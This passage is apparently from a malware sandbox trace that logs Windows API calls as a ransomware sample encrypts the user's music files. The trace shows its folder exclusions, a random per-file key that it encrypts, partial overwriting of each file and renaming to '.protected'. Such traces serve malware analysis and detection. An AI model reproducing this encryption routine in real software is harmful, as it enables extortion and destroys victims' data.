(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d80c27uiwq unp3.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d80c27uiwq unp3.wav.protected")) returned 1 [0092.252] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.252] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.252] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.252] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.253] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.253] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.253] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.253] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.253] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.253] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.253] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.253] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.254] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.254] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.254] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.254] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.254] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.254] CloseHandle (hObject=0xb4) returned 1 [0092.254] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.protected") returned 61 [0092.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.protected")) returned 1 [0092.255] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="Windows") returned -1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="Program Files") returned -1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="Program Files (x86)") returned -1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="$Recycle.bin") returned 1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="System Volume Information") returned -1 [0092.255] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.255] StrStrIW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".protected") returned 0x0 [0092.255] lstrcmpW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f-yh3ediagexl01i0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.255] StrStrW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".txt") returned 
0x0 [0092.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.255] StrStrW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".rar") returned 0x0 [0092.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.256] StrStrW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".zip") returned 0x0 [0092.256] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.256] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.256] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.256] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.256] CloseHandle (hObject=0xb4) returned 1 [0092.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3.protected") returned 71 [0092.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\music\\f-yh3ediagexl01i0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f-yh3ediagexl01i0.mp3.protected")) returned 1 [0092.257] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="Windows") returned -1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="Program Files") returned -1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="Program Files (x86)") returned -1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="$Recycle.bin") returned 1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="System Volume Information") returned -1 [0092.257] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.257] StrStrIW (lpFirst="GyaaV1K.m4a", lpSrch=".protected") returned 0x0 [0092.257] lstrcmpW (lpString1="GyaaV1K.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.257] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.257] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gyaav1k.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.258] StrStrW (lpFirst="GyaaV1K.m4a", lpSrch=".txt") returned 0x0 [0092.258] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.258] StrStrW (lpFirst="GyaaV1K.m4a", lpSrch=".rar") returned 0x0 [0092.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.258] StrStrW (lpFirst="GyaaV1K.m4a", lpSrch=".zip") returned 0x0 [0092.258] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.259] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.259] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.259] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.259] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.259] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.259] CloseHandle (hObject=0xb4) returned 1 [0092.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a.protected") returned 61 [0092.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gyaav1k.m4a"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gyaav1k.m4a.protected")) returned 1 [0092.260] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="Windows") returned -1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="Program Files") returned -1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="Program Files (x86)") returned -1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="$Recycle.bin") returned 1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="System Volume Information") returned -1 [0092.260] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ") returned 57 [0092.260] lstrcmpW (lpString1="kBpzP-b4RDX-RknRQ", lpString2=".") returned 1 [0092.260] lstrcmpW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="..") returned 1 [0092.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\*") returned 59 [0092.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.260] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.260] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.260] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.260] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.260] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\.") returned 59 [0092.260] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.260] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.261] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.261] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.261] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.261] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\..") returned 60 [0092.261] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="Windows") returned -1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="Program Files") returned -1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="Program Files (x86)") returned -1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="$Recycle.bin") returned 1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="System Volume Information") returned -1 [0092.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.261] StrStrIW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".protected") returned 0x0 [0092.261] lstrcmpW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.261] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.261] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\3ib5l uwaaj3_mksp3pc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.262] StrStrW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".txt") returned 0x0 [0092.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.262] StrStrW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".rar") returned 0x0 [0092.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.262] StrStrW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".zip") returned 0x0 [0092.262] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.262] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.262] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.262] SetFilePointerEx (in: hFile=0xd4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.263] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.263] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.263] CloseHandle (hObject=0xd4) returned 1 [0092.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3.protected") returned 92 [0092.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\3ib5l uwaaj3_mksp3pc.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\3ib5l uwaaj3_mksp3pc.mp3.protected")) returned 1 [0092.264] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="Windows") returned -1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="Program Files") returned -1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="Program Files (x86)") returned -1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="$Recycle.bin") returned 1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="System Volume Information") returned -1 [0092.264] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.264] StrStrIW (lpFirst="4iswZr.wav", lpSrch=".protected") returned 0x0 [0092.264] lstrcmpW (lpString1="4iswZr.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.264] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.264] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\4iswzr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.265] StrStrW (lpFirst="4iswZr.wav", lpSrch=".txt") returned 0x0 [0092.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.265] StrStrW (lpFirst="4iswZr.wav", lpSrch=".rar") returned 0x0 [0092.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.265] StrStrW (lpFirst="4iswZr.wav", lpSrch=".zip") returned 0x0 [0092.265] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.266] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.266] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.266] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.267] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.267] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.267] CloseHandle (hObject=0xd4) returned 1 [0092.267] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav.protected") returned 78 [0092.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\4iswzr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\4iswzr.wav.protected")) returned 1 [0092.268] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="Windows") returned -1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="Program Files") returned -1 [0092.268] lstrcmpiW 